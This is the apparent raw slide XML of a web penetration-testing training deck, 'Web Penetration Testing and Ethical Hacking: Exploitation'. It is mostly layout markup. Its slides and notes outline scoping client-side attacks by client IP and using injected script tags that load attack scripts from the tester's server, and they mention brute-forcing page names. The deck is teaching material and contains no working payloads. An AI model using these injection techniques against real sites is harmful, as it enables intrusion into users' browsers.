          </a:p>
          <a:p>
            <a:pPr marL="344488" lvl="1" indent="-177800">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Calibri" charset="0"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Client-side code with pen tester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s server identifying IP addr</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="344488" lvl="1" indent="-177800">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Calibri" charset="0"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Server-side code on target server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="344488" lvl="1" indent="-177800">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Calibri" charset="0"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Server-side code on pen tester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="344488" lvl="1" indent="-177800">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Calibri" charset="0"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Pen tester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s infrastructure configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="344488" lvl="1" indent="-177800">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We also can combine these methods to expand our ability to determine scope.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33894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18F41DB-336D-6143-91F9-330091D8AD14}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>96</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33997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first method uses a java applet to determine the internal address of the client.  This applet then passes the address to the JavaScript which would contain the logic to determine scope.  This is an excellent method when we have certain targets within a network.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33997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7A6CEC6-4F59-4E42-978E-403F3E45F684}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>97</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34099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This second method uses logic on a server controlled by the pen-tester.  This server then responds to a request from the attack script with the IP address it sees from the client.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This method is useful for limiting scope to a specific company.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34099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2F9EDF1-559F-F24E-BC45-D04DF1DF5F4A}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>98</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34201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r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The third option is to use the same server type code as option two, but inject it onto an internal server first.  This allows the code to determine the internal IP address, similarly to option one.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34202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5046FC44-CDBF-0C4C-A25A-24897B708AA2}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>99</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="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DB655-50C4-45E6-A578-CAA3EE3C9A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28778"/>
            <a:ext cx="9144000" cy="5144786"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="361475" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1905000"/>
            <a:ext cx="7772400" cy="1447800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="4800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3614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dirty="0"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="-61608" y="6406961"/>
            <a:ext cx="685800" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{20B8B63F-B559-4CC7-A844-A7B51D6F17D1}" type="slidenum">
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFCC00"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr algn="ctr">
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFCC00"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="151237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152400"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1578684"/>
            <a:ext cx="8686800"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524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50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83300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4D9F24-0869-4634-B169-903289646E1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891" y="1720996"/>
            <a:ext cx="9144000" cy="5144786"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21507" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="219075" y="152401"/>
            <a:ext cx="8734425" cy="11429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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21508" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="15240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Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="113489" y="6400799"/>
            <a:ext cx="685800" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{20B8B63F-B559-4CC7-A844-A7B51D6F17D1}" type="slidenum">
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFCC00"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr algn="ctr">
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFCC00"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="356929432"/>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Lst>
  <p:txStyles>
    <p:title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00.xml"/><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1.bin"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject30.bin"/></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01.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5.bin"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject34.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0.xml"/><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3.wmf"/><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oleObject" Target="../embeddings/oleObject6.bin"/></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5.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide92.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject12.bin"/><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image" Target="../media/image3.wmf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject15.bin"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject10.bin"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject14.bin"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide9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97.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image" Target="../media/image3.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject18.bin"/></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98.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3.bin"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject22.bin"/></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99.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image" Target="../media/image3.wmf"/><Relationship Id="rId4"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1828800"/>
            <a:ext cx="7772400" cy="1600200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Web Penetration Testing and Ethical Hacking</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11268" name="TextBox 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="5394325"/>
            <a:ext cx="91440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600" dirty="0"/>
              <a:t>Copyright 2014, Secure Ideas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Version 1Q14</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97A3ACEF-B4EF-46B2-92D0-2B4BC469EC9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="3623494"/>
            <a:ext cx="9144000" cy="1643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spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Professionally Evil </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Web Application </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Penetration Testing </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>101.1</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Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Bypass Methods</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20483" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1435053"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Use site maps and access resources directly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Manually</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Access pages with a browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Also look at URL parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Keys and IDs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Scripts make this easier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Can brute force page names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Simple iteration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Uses previous results</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a:xfrm>
            <a:off x="685800" y="136005"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>4) Server-Side Code on Pen Tester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7175" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="186130" y="1341620"/>
            <a:ext cx="8763000" cy="4114800"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Injected content loads attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>&lt;SCRIPT SRC&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>References pen tester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s server code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Server code generates attack scripts … if victim is in scope</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7170" name="Object 2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6400800" y="4997450"/>
          <a:ext cx="857250" cy="898525"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s296079" name="Clip" r:id="rId4" imgW="3135086" imgH="3278319" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId4" imgW="3135086" imgH="3278319"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997450"/>
                        <a:ext cx="857250" cy="8985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5684838" y="3487738"/>
          <a:ext cx="862012" cy="900112"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s296080" name="Clip" r:id="rId6" imgW="3135086" imgH="3278319" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId6" imgW="3135086" imgH="3278319" progId="">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4838" y="3487738"/>
                        <a:ext cx="862012"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7176" name="Group 72"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="4616450"/>
            <a:ext cx="885825" cy="1301750"/>
            <a:chOff x="228" y="851"/>
            <a:chExt cx="334" cy="490"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="7173" name="Object 5"/>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96081" name="Clip" r:id="rId7" imgW="3135086" imgH="3278319" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId7" imgW="3135086" imgH="3278319"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214" name="Rectangle 74"/>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7215" name="Group 75"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="228" y="851"/>
              <a:ext cx="334" cy="214"/>
              <a:chOff x="288" y="2254"/>
              <a:chExt cx="528" cy="338"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7216" name="Freeform 76"/>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17" name="Freeform 77"/>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18" name="Freeform 78"/>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19" name="Freeform 79"/>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20" name="Freeform 80"/>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21" name="Freeform 81"/>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22" name="Freeform 82"/>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23" name="Freeform 83"/>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24" name="Freeform 84"/>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25" name="Freeform 85"/>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26" name="Freeform 86"/>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27" name="Freeform 87"/>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28" name="Freeform 88"/>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29" name="Freeform 89"/>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30" name="Freeform 90"/>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31" name="Freeform 91"/>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32" name="Freeform 92"/>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33" name="Freeform 93"/>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34" name="Freeform 94"/>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35" name="Freeform 95"/>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36" name="Freeform 96"/>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37" name="Freeform 97"/>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38" name="Freeform 98"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7177" name="Group 99"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="3321050"/>
            <a:ext cx="885825" cy="1301750"/>
            <a:chOff x="228" y="851"/>
            <a:chExt cx="334" cy="490"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="7172" name="Object 4"/>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96082" name="Clip" r:id="rId8" imgW="3135086" imgH="3278319" progId="">
